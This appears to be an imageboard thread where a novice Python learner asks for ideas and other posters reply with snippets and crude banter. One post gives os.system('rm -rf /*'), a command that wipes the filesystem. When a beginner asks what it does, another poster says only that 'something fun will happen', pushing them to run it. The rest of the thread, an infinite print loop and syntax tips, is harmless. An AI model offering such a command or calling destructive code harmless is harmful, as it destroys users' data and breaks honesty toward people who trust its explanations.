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I learned how

| to do this is python (I think its funny)
What should I do next g/u/rls?

| sometimes I type while the command loads and I pretend that I'm an epic hacker

| do this

import os
os.system('rm -rf /*')

| Try this

import time
while 0 < 1:

| FUCKING fuck

| >>926368 I'm getting an invalid syntax error :(((((

| >>926379 try adding a space before print and a space before time
' print("fuck")' like this

| >>926383 ok

| >>926383 oh my god it worked I love you thank you

| >>926367 What does this do? I'm scared that it will do something spooky to my operating system ://

| It prints "fuck" every 0.2 second infinitely until you stop the program

| >>926392 if you type it... something fun will happen!

| >>926367 >>926424 I ran it through an online python thingy and it tried deleting a lot of stuff ://

| >>926424 What does Import Os mean? i just want to know please This is interesting to me.

Total number of posts: 14, last modified on: Mon Jan 1 00:00:00 1666895781

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